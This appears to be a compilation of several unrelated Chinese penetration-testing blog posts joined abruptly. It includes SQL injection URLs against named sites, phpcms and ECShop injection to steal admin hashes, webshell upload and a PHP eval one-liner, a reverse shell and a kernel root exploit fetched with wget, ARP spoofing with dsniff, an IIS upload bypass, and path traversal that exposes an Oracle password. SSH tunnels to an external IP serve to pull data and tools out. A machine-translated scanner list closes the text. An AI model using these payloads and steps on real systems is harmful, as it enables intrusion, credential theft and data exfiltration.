Web应用程序一般都会使用数据库来保存各种信息，比如电子商务网站的帐户信息、销售商品的价格，订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的，因此，在数据交互的环节没有安全过滤净化，则可能易于受到SQL注入攻击，严重的可能导致数据库非法操作，但是随着时间的推移，Web应用程序的开发者安全意识的日渐增强，SQL注入漏洞已经呈下降消失状态，但是之前的Web程序在被动防范SQL攻击时，还是略显乏力，或者说是考虑不太周全。比如说普遍使用的过滤关键字的方法，如果仅仅过滤单引号或者小写类的关键字，则极易出现绕过的情形，而国内的安全公司相继推出的硬件WAF是否会存在同样的问题呢？从根本上说硬件WAF基于访问请求流量来鉴别攻击行为，可能在以后的攻防对立的演化过程也会慢慢有爆出被绕过的问题，所有的问题依然存在。本文试着在注入的SQL语句中不引用单引号，来和大家讨论一下注入攻击的部分原理和技巧。在一次测试中，发现一注入点过滤了单引号和小写的关键字，提交语句如下：

http://www.nuanyue.com/Test.asp?id=28′ AND 1=(SELECT @@VERSION)—

去掉单引号再次提交：

 http://www.nuanyue.com/Test.asp?id=28 AND 1=(SELECT @@VERSION)—

成功爆出数据库的系统版本了，说明在处理数据提交时，网站即使过滤了单引号了，依然可以注入。以下将和大家讨论获取数据库名、获取表名、获取列名、获取值等内容的部分SQL语句。在Mssql2005的master.dbo.sysdatabases表中存放着SQLSERVER数据库系统中的所有的数据库信息，仅需要PUBLIC权限就可以进行select操作：

use master;

SELECT * FROM MASTER.DBO.SYSDATABASES

一至四，都是系统自带的数据库名，所以可以通过dbid这个查询变量来一一进行爆出数据库名，提交查询语句：

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT NAME FROM MASTER.DBO.SYSDATABASES WHERE DBID=3)

查询语句通过dbid取值从1至到无法爆出数据库名为至。

在Mssql2005版本里每个数据库都有一个用来存放表名信息的表，其权限同样仅public权限就能查询了,表名为：INFORMATION_SCHEMA.TABLES。

use master ;

select * from INFORMATION_SCHEMA.TABLES;

表名就存储在TABLE_NAME列里，通过使用条件查询语句限制型“Top 1”，一条条纪录爆出表名来。

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)

其为爆出的第一条纪录。如想爆出第一条记录，即可以使用sql语法的条件语句“where table_name !=0x已经爆出表名的十六进制”来取内容。先取已爆表名的十六进制。

再提交语句如下：

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME!=0x41006400760065007200740069007A0065007200)

成功爆出第二个表名，剩下的以此类推。当然读取数据库的INFORMATION_SCHEMA.TABLES表内容，只是当前数据库的表名，如果要读取整个数据库的表名，可以读sysobjects表的name列名，原理同上。

在获取表名，得到列名是注入的下一个关键问题，在MSSQL 2005的数据库里，有张表名sys.all_objects里存放着表与列的信息，其表的列名object_id里存放着一个数值，对应着另一表名sys.all_columns里的列名ID,而sys.all_columns表里存放着列的信息。执行：

Select * from sys.all_objects

由上图可知，列名name和列名object_id是有对应的。在注入时，可以通过指定name值来指定爆表的object_id的值。提交：

 http://www.nuanyue.com/Test.asp?id=28 AND 999999< (SELECT TOP 1 CAST([OBJECT_ID] AS NVARCHAR(20)) FROM SYS.ALL_OBJECTS WHERE43006C00690063006B0049005000)—

以上语句是无法直接爆出数值来的，但是可以用折半法来进行猜解，由于其数值都在10位以上，所以，其法也不太可能，但是可以联合两张表来直接查询。再次提交：

 http://www.nuanyue.com/Test.asp?id=28 AND 9 in (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0x43006C00690063006B0049005000)—

已经爆出表名0x43006C00690063006B0049005000的第一个列名ID了，可以加入条件”and B.NAMe != 0x已经爆出的列名”， 类推可以依次爆出。

 http://www.nuanyue.com/Test.asp?id=28 AND 9 in (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0x43006C00690063006B0049005000 AND B.NAME!=0×49004400)—

在获取了表名和列名之后，获取其值也是很简单的。比较常用的有比如这样的获取值的：

http://www.nuanyue.com/Test.asp?id=28 AND 77= (SELECT ascii(@@VERSION))

http://www.nuanyue.com/Test.asp?id=28 AND 1=2 UNSION SELECT 1,2,3..@@VERSION–…

一种是爆错对比，一种是union操作。第一种是基于查询后值的对比，而union操作是将执行返回的结果直接在浏览器显示，从而避免繁琐的折半猜测，在使用union操作时，前提则是前后查询的两种结果的结构相同，即是列名数相同，可以通过“order by 列名数“来鉴别。

 http://www.nuanyue.com/Test.asp?id=28 order by 1—

 http://www.nuanyue.com/Test.asp?id=28 order by 2

…

 http://www.nuanyue.com/Test.asp?id=28 Order by 8—

此时，返回错误页面，即说明列名数是8，执行语句：

 http://www.nuanyue.com/Test.asp?id=28 and 1=2 Unsion select 1,2,3,4,5,6,7,8—

来取出纪录。

防范SQL注入攻击，尽管不同的数据库也会有不同的攻击技巧，复杂程序也各不相同，而许多SQL注入防范措施仅仅从某一处着手或者部分有效，从一个安全整体的角度立体的防护或许是值得借鉴的方法，比如从代码逻辑层、数据库层、网络层、系统层等，从本文阐述的原理来看，下次针对数据库的安全加固，你是否会调整一下“SYSOBJECTS、SYSCOLUMNS”等对象的权限呢？好像数据库批量挂马也有用到这两个表哦！

渗透的主机是一朋友的，双线架设的虚拟主机，里面有几个站，架构是apache+php+mysql。在测试前，信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等，都是值的统计分析和利用的。先对主机来端口扫描：

由图可知：这台服务器开放了80、443、5901等端口，开放了WEB、https、VNC等端口。由于是虚拟主机，确认其有多少个域名和网站，是旁注的第一步。使用虚拟主机站点查询工具，进行查询：

由上图可知，此IP上共有七个站点。随便浏览了这七个站点，其中有个站好像有问题。如下图：

很眼熟的phpcms标志。既然有主站在使用开源的CMS，值得“深入”。拿出wwwscan工具进行进一步扫描。

扫描结束后，告诉了几个目录，一一访问，寻找有没有敏感信息。

一个管理员界面，说明phpcms是2007版的。从分析结果来看，其一网站使用了phpcms2007版的程序，在Web应用程序渗透测试，注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是：0xbf27不是有一个有效的GBK字符，但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符，所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理，结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个，以area.php文件里的漏洞来作测试。
提交URL：http://www.nuanyue.com/area.php?action=city&province=%BF%27

很经典的一个多字节编码漏洞的网页。继续提交来判断列数：
http://www.nuanyue.com/area.php?action=city&province=%BF%27 order by 1/**

由上图可知，返回正常网页。继续提交URL：
http://www.nuanyue.com/area.php?action=city&province=%BF%27 order by 2/**

返回不正常网页。
说明列数值是1，继续提交：
http://www.nuanyue.com/area.php?action=city&province=%BF%27/**/union/**/select/**/user()/**

看来网站连接数据库的权限很大。还可以通过version(),data()..等收集信息。直接暴露phpcmd后台的管理员和密码。利用后台可以上传编辑php文件获取WebShell。继续提交：
http://www.nuanyue.com/area.php?action=city&province=%BF\%27/**/union/**/select/**/CONCAT(username,password)/**/from%20phpcms_member%20where%20userid=1/*

由上图可以知道，网站的管理员是phpcms，而密码是32MD加密的。可以直接去md5相关网站去查询如图：

已经知道管理后台帐号和密码了。直接进后台去上传脚本木马了。由于phpcms程序在后台上传php脚本没有限制，所以得到后台，就可以上传脚本木马。

其次渗透测试利用的方法主要是旁注，旁注的意义在于“曲径通幽”，进而获取系统权限。在此之前，收集数据库信息、系统信息、网站信息和系统管理员的信息进行综合分析利用，在社工是有意义的。在获取一网站的权限，我们进行分析。

获取系统的mysql的管理员帐号是root,密码是12*。许多管理员有密码系统多用的情况，来试试vnc是不是也用这个密码？

直接进去了，获取root权限，连用exp来提权都省了。“三分技术，七分管理”，很好的验证，一个密码多用或者密码有规律的都是存在风险的。

内网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破，到控制整个内网的全过程来跟大家讨论，内网的渗透嗅探术和安全防护一些内容。

在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时，大概分为这样两步： 端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：

从上图可以读取以下信息：
系统类型：Fedora
应用程序：apache/2.2.4
以上只是很简单的手工对程序指纹进行分析，当然在针对web应用的扫描器，还有很多，比较常用的wvs、appscan等。用轻量级的”wwwwscan”来扫描：

由扫描的结果可以看到，与手工探测的结果是一致的。

通上面简单的信息收集后，可以了解到网站架构是apache+mysql+php,直接请求URL：http://61.67.xx.116/htdocs/

发现此站是EcShop架构的站点，其使用的版本信息是V2.5.0。EcShop的版本是存在许多的注入点的。其中user.php文件有个注入漏洞，直接请求URL如下：
http://61.67.xx.116/htdocs/user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

获取管理员帐号和密码，ECShop使用的是MD5加密，直接解密。原来密码是admin，有点意料之外。访问管理后台，修改模版处，插入一句木马，即可得到WEBSEHLL，如图：

在获取WEBshell权限后，就需要对系统进行分析，查找Exp了。执行命令如下：
#uname –a

返回的信息是“Linux fedora 2.6.20-1.2962.fc6 ”，Linux内核是2.6.20的。
在提权时，要用到gcc进行编译，刺探一下系统有没有安装，执行命令，
#gcc –help

发现可以运行gcc,并且系统管理员没对使用shell和gcc进行限制，在也是个安全缺失。

在寻找本地提权利用程序时，通常是根据系统版本来进行，应用程序的本地提权也是一样的。在网上就有可供查询的网站，比如http://www.milw0rm.com/网站如图：

发现可利用的漏洞还真不少。

本地提权是需要个交互式的shell的。在本机监听端口如下：

利用WebShell自带的反弹功能直接连接本地的12345端口并返回shell如图：

连接成功后，就能得到一个apache用户的shell
，但有时如果不能交互时，可以直接执行，
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);’
来得到交互的Shell,一般的系统都默认安装python
如图：

提示成功了，可以新建个目录用来存放提权的工具。

在Linux提权大致可分为，第三方软件漏洞、本地信任特性、内核溢出等，比较常用的溢出率高的，当属内核了。用Wget下载溢出源码，用到的漏洞是Linux vmsplice Local Root Exploit
，成功率蛮高的，gcc编译，执行，如图：

成功获取root权限，在选择溢出利用程序时，有时需要进行多次测试。

什么是Sniffer，sniffer是利用截获目的的计算机通信，通过分析截获的数据，提取敏感信息的工具。但其通过什么方法来截获数据呢？在此之前得解释一下arp（Address Rrsolution Protocol）协议,即地址解析协议，它位于TCP/IP协议栈中的低层协议，负责将某个IP地址解析成对应的MAC地址。它靠维持在内存中保存的一张表来使IP得以在网络上被目标机器应答。在数据传送时，IP包里就有源IP地址、源MAC地址、目标IP地址，如果在ARP表中有相对应的MAC地点，那么根据最优选择法，直接访问，如果，没有对应的地址，就要广播出去，在网内寻找对应的地址，如果对方的IP地址和发出的目标IP地址相同，那么对方会发送MAC地址给源主机，，而此时，如果攻击者也接听到发送的IP地址，它就会仿冒目标主机的IP地址，然后返回自己的主机的MAC地址给源主机，因为源主机发送的IP包没有包括目标主机的MAC地址，而ARP表里面又没有目标IP和目标MAC地址的对应表，就会接受攻击者的MAC而选择与其通信，所以就此产生了ARP欺骗。在系统刚启动时，可以在DOS下输入命令“arp -a”来查看本机arp缓存表的内容，如图：

我们来与IP192.168.0.5进行通信，通信后arp缓存表就会有这样一条MAC地址和IP对应的记录。如图：

在本机多了条缓存中的IP和MAC的对应纪录。

Dsniff是一个著名的网络嗅探工具包，其开发者是Dug Song，其开发的本意是用来揭示网络通信的不安全性，方便网络管理员对自己网络的审计，当然也包括渗透测试，其安装包里某此工具，充分揭示了协议的不安全性。作为一个工具集，Dsniff包括的工具大致分为四类：
一、 纯粹被动地进行网络活动监视的工具，包括：dsniff、filesnarf、mailsnaf、msgsnarf、urlsnarf、webspy
二、 针对SSH和SSL的MITM“攻击”工具，包括sshmitm和webmitm
三、 发起主动欺骗的工具，包括：arpspoof、dnsspof、macof
四、 其它工具，包括tcpkill、tcpnice

Dsniff的官方下载：www.monkey.org/~dugsong/dsniff/ 这个是源码包，解压后可以看下README,提示需要五个软件的支持：openssl、Berkeley_db、libnet、libpca、libnids
下载地址如下：
Berkeley_db: http://www.oracle.com/technology/software/products/berkeley-db/index.html
libpcap: http://www.tcpdump.org/release/libpcap-1.0.0.tar.gz
ftp://rpmfind.net/linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm
ftp://rpmfind.net/linux/epel/5/i386/libnet-1.1.4-1.el5.i386.rpm
ftp://rpmfind.net/linux/epel/5/i386/libnids-1.23-1.el5.i386.rpm
系统一般默认都有安装openssl、libpcap。

一、	Tar包安装
如果下载的是源包，文件如下：openssl-0.9.7i.tar.gz、libnids-1.18.tar.gz、libpcap-0.7.2.tar.gz、libnet-1.0.2a.tar.gz、Berkeley db-4.7.25.tar.gz
a)	安装openssl
用tar解压软件包手，执行三条命令
#./config
#make
#make install
b)	安装libpcap
#./config
#make
#make install
c)	安装libnet
#./config
#make
#make install
d)	安装libnids
#./config
#make
#make install
e)	安装libnids
#./config
#make
#make install
f)	安装Berkeley DB
#.cd build_unix
#../dist/configure
#make
#make install
g)	安装dsniff
#./configure
#make
#make install
程序安装好后，先查看一下网卡信息，然后开启服务器IP转发，命令如下：
# echo "1" > /proc/sys/net/ipv4/ip_forward

先来双向欺骗，用到arpspoof，其命令是：
#arp –t 网关 欺骗主机IP
如图：

arpspoof已经开始工作了，可以用tcpdump查看一下被攻击主机是否有数据经过
命令如下：
#tcpdump –I eth0 host 61.67.x.115
如图：

有数据交换，说明欺骗的比较成功，然后用Dsniff开始嗅探目标主机，命令如下：
#Dsniff –c –f /etc/dsniff/dsniff.services
这个dsniff.services自然就是保存端口和服务对应关系的文件，如需要保存到文件，需加-w filename数据全是明文传送的。所以数据分析完全能用肉眼发现，如图：

从这条数据可以看到HTTP登录和FTP登录信息，帐号和密码全是明文的。而经过测试，通过FTP上传的目录正是WEB目录，获取WEBShell权限，继续提权即可控制主机。Linux下的嗅探，其实更容易一些，在最近爆出的高危本地提权，不知道有多少台主机沦陷呢？在攻与防的游戏里，系统管理员往往显得如此的无助。

图/三种技术评估对比表

由表可知，核心内嵌技术许是最好的防篡改解决方案了。只是在攻击手段层出不穷的今天，系统配置是否最佳和WEB应用层防护是否关乎全局，在都是些较关键的问题。

在检测一下网站时，从扫描结果得到一个

http://www.nuanyue.com/admin/fckeditor/editor/filemanager/connectors/test.html

可以看出这是fckeditor的上传页面，通过点击不同的文件类型，fckeditor是支持多种文件类型文件上传的，所以，有的管理员可能根据需要不同而配置了不同的文件，可以通过选择Connector不同的文件类型，再点击”Get Folders and Files”来查看文件夹，如果存在文件夹，如下图，如果返回空白页面或者出错信息，则没有启用这类文件的上传配置。

通过测试发现，网站管理员配置了asp.net,并且可以在resource Type “Media”可以创建和可列目录，这条思路其实有人在网上已经提过，大致思路是通过创建asp文件夹，再往asp传送图片木马。只是没有公布怎么建立类似于x.asp这样的文件夹呢。在fckeditor里，是会对“.“进行转换成“_“的。如果你输入建立”x.asp“,其实建立的是”x_asp”文件夹。如图

提交一条这样的语句就可以

http://www.nuanyue.com/admin/FckEditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=c.cdx&NewFolderName=z&uuid=1244789975684

创建一个”c.cdx”的文件夹，在提交时需要uuid参数，原理跟aps文件夹一样，在这个文件夹放置的图片文件IIS会当作asp文件来解析的。由于在默认的编辑器默认测试页面，管理员禁用了上传功能，只能允许创建目录，所以，在后台找到一处上传的地方，其URL：

http://www.nuanyue.com/admin/adminimg.aspx?simage=images2&bimage=images&path=%2fadmin%2fUploadFile%2fmedia%2fz.cdx&returnpath=admin/pic&wsize=270&hsize=190

通过参数returnpath把目录直接指向“/admin/pic“，直接把它指向刚刚建立的z.cdx文件夹admin%2fUploadFile%2fmedia%2fz.cdx

http://www.nuanyue.com/imgresize/imgresize.aspx?simage=images2&bimage=images&path=%2fadmin%2fUploadFile%2fmedia%2fz.cdx&returnpath=admin%2fUploadFile%2fmedia%2fz.cdx&wsize=270&hsize=190

在后台直接上传文件或者图片木马，但是原因其服务器上有iGuard，是不能执行的。如图：

突破iGuard其实用得也是图片木马的原理，先把一张图片和一个小马，就用比较经典的diy.asp上传文件的马。命令如下：

C:>copy /b 图片+图片木马 图片木马

其主要欺骗iGuard，告诉它，“这不是寂寞，这是一张图片”

上传执行如图：

当然还有另一种方法了，这种方法可以减少了创建特殊文件夹的过程。原理跟这个也是一样的，就是不久前让人爆出的Nday，其实传来传去很长时间了。“Microsoft IIS 5.x/6.0 0解析文件名漏洞”，此漏洞描述：“当文件名为x.asp;x.jpg时，Microsoft IIS会自动以asp格式来进行解析。而当文件名为x.php;x.jpg时，Microsoft IIS会自动以php格式来进行解析。”上传一个这样格式的图片木马，iGuard也会放行的。只所以能成功上传，大致可以看成是iGuard对文件检测过于简单，而IIS本身的缺陷也是主要的原因。【本文已经发表于黑客防线】

2.完全POST提交，避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话，插完时间也改回来了，那么管理员发现的概率就相当低了。(海洋的不是全POST)

大概原理:

一键提交版的一句话客户端连接成功之后，每次POST数据的时候, 假设一句话密码是c，都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);

chr(120)就是字母c，为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候，才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。

备份下载：zerosoul_PHP_eval_Client

手工一个一个文件慢慢翻，翻了好多发现有的文章提示“没有图片”，也就是说可能有的文章附有图片了。一个个找终于看到一张图片，右键查看一下图片URL，发现有些可疑：

http://webhost/AjaxAction.do?actionType=showimage&id=1101110623085223t.jpg

试一下改变成：

http://webhost/AjaxAction.do?actionType=showimage&id=111actionType=showimage&id=111

出错了：

java.io.IOException: 文件不是图片格式，请检查后继续！只能输出gif、jpg、png三种格式文件！
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:68)
cn.com.chx.eform.AjaxAction.showImage(AjaxAction.java:265)

再试试有没有过滤结束符构造一个合法的：

http://webhost/AjaxAction.do?actionType=showimage&id=111%00.gif

非常有意思，不但得到了web path而且还成功欺骗了程序：

java.io.FileNotFoundException: E:\webhost\server\default\deploy\root.war\WEB-INF\resource\111?3;.gif (系统找不到指定的文件。)
java.io.FileInputStream.open(Native Method)
java.io.FileInputStream.(FileInputStream.java:106)
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:74)

再试试能不能返回上级目录，因为上面暴出了web path，所以退只要两格：

http://webhost/AjaxAction.do?actionType=showimage&id=../../login.jsp%00.gif

哈哈，直接看到了jsp源码~~~
接下来可以去尝试读一下web-inf下面的xml文件：

http://webhost/AjaxAction.do?actionType=showimage&id=../../web-inf/chx-config.xml%00.gif

找到了最重要的oracle密码(直接访问xml访问不了）：
- oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl xbox xbox123qwe@#$_web 做渗透测试项目就做到这就可以了，接下来要绕过fw利用oracle获得个systemshell也并非难事

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。
由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令：
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.
后台认证用户/密码，通常和-N连用，不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd服务器的sshd服务端口。

-L port:host:hostport
将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-R port:host:hostport
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-D port
指定一个本地机器 “动态的’’ 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS4 协议, 将充当 SOCKS4 服务器. 只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发.

-C Enable compression.
压缩数据传输。

-N Do not execute a shell or command.
不执行脚本或命令，通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.
在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接。注：这个参数我在实践中似乎始终不起作用)

如果想要了解更多关于SSH的细节，可以 man ssh ，或参照ssh的DOC.

实例：
——————————————————————————
当骇客A从互联网入侵了RISUN企业的一台服务器，机器名称为 GBOSS_WEB
GBOSS_WEB 信息：
外网IP：255.25.55.111
内网IP：10.168.0.10
网络架构方式为，路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。

骇客A通过利用80端口开放服务的WEB脚本漏洞，成功继承到GBOSS_WEB的httpd权限，然后通过perl或者其它语言创建SOCKET获得一个远程sh shell。由于back回来的shell可能不稳定，或者使用起来不方便，可以采用SSH建立一个隧道，将GBOSS_WEB服务器上的22端口映射至骇客的本机上(本文章用于演示的骇客机为0x.cn)；

通过得到的sh shell，执行 $python -c ‘import pty; pty.spawn(“/bin/sh”)’ 获得一个ttyshell(因为ssh想要tty的支持)，然后通过如下命令，映射GBOSS_WEB服务器的22端口至202.65.208.142的44端口；
$ssh -C -f -N -g -R 44:127.0.0.1:22 ring04h@202.65.208.142
这样登录0x.cn的ssh服务，ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口。

骇客A通过利用操作系统系统提升权限至ROOT，再继续渗透过程中，发现内网还存在另外一台名称为GBOSS_APP的服务器。
GBOSS_APP 信息：
内网IP：10.168.0.20

骇客通过嗅探获取了GBOSS_APP服务器的FTP信息，GBOSS_APP服务器FTP保存有RISUN企业的核心数据，由于数据量庞大，需要FTP续传功能，可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口；
$ssh -C -f -N -g -R 2121:10.168.0.20:21 ring04h@202.65.208.142

当骇客成功root掉内网中另一网段中的服务器BILL_APP时，需要从外网下载一些工具，由于内部访问控制策略，BILL_APP无法连接网，此时可以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口，然后通过GBOSS_WEB建立的隧道，下载所需工具。
在GBOSS_WEB服务器上执行：
$ssh -C -f -N -g user@10.168.0.10 -L 8888:202.65.208.142:80

通过建立隧道后，在BILL_APP上执行 wget http://10.168.0.10:8888/thepl 等同于访问http://202.65.208.142/thepl

本文详细的概述了如何建立隧道的过程，以及相关参数的使用方法，各位懂的高手可以直接飘过。
本文中骇客所使用的地址为真实IP，对应域名：http://0x.cn 欢迎无聊的骇客们破坏。(SSH有个隐藏的密码，很容易的…)

It can also perform these Server Checks:它也可以执行这些Server检查：
* CGI, CGI-Bin & CGI-Local Folders *共同闸道介面， cgi – bin目录和CGI方式，本地文件夹
* CGI-Sys *的CGI -系统
* Common Files and Folders *常见的文件和文件夹
* Common Server Vulnerabilities: Cisco IOS, ColdFusion, Domino, IIS, NCSA, FrontPage, FrontPage CGI *通用服务器漏洞：思科IOS ， ColdFusion ，多米诺， IIS中，国家能力自评时， FrontPage ， FrontPage中的CGI
* Common Vulnerable Scripts: ASP, ASP .Net, PHP, JSP, Perl *共同弱势脚本： ASP技术， ASP技术。净的， PHP ， JSP的，的Perl
* Compliance: SANS Top Twenty *遵守： SANS的前20
* Database Disclosure * 数据库披露
* Denial-of-Service *拒绝服务
* IDS Testing *入侵检测系统测试
* Old/Backup Files: Common Backup Folders & Files *旧/备份文件：共同的备份文件夹和文件
* Outdated Server Software *过时的服务器软件
* Web-Based Backdoors *基于Web的后门
* WinCGI * WinCGI

下载：sandcat-3.7.8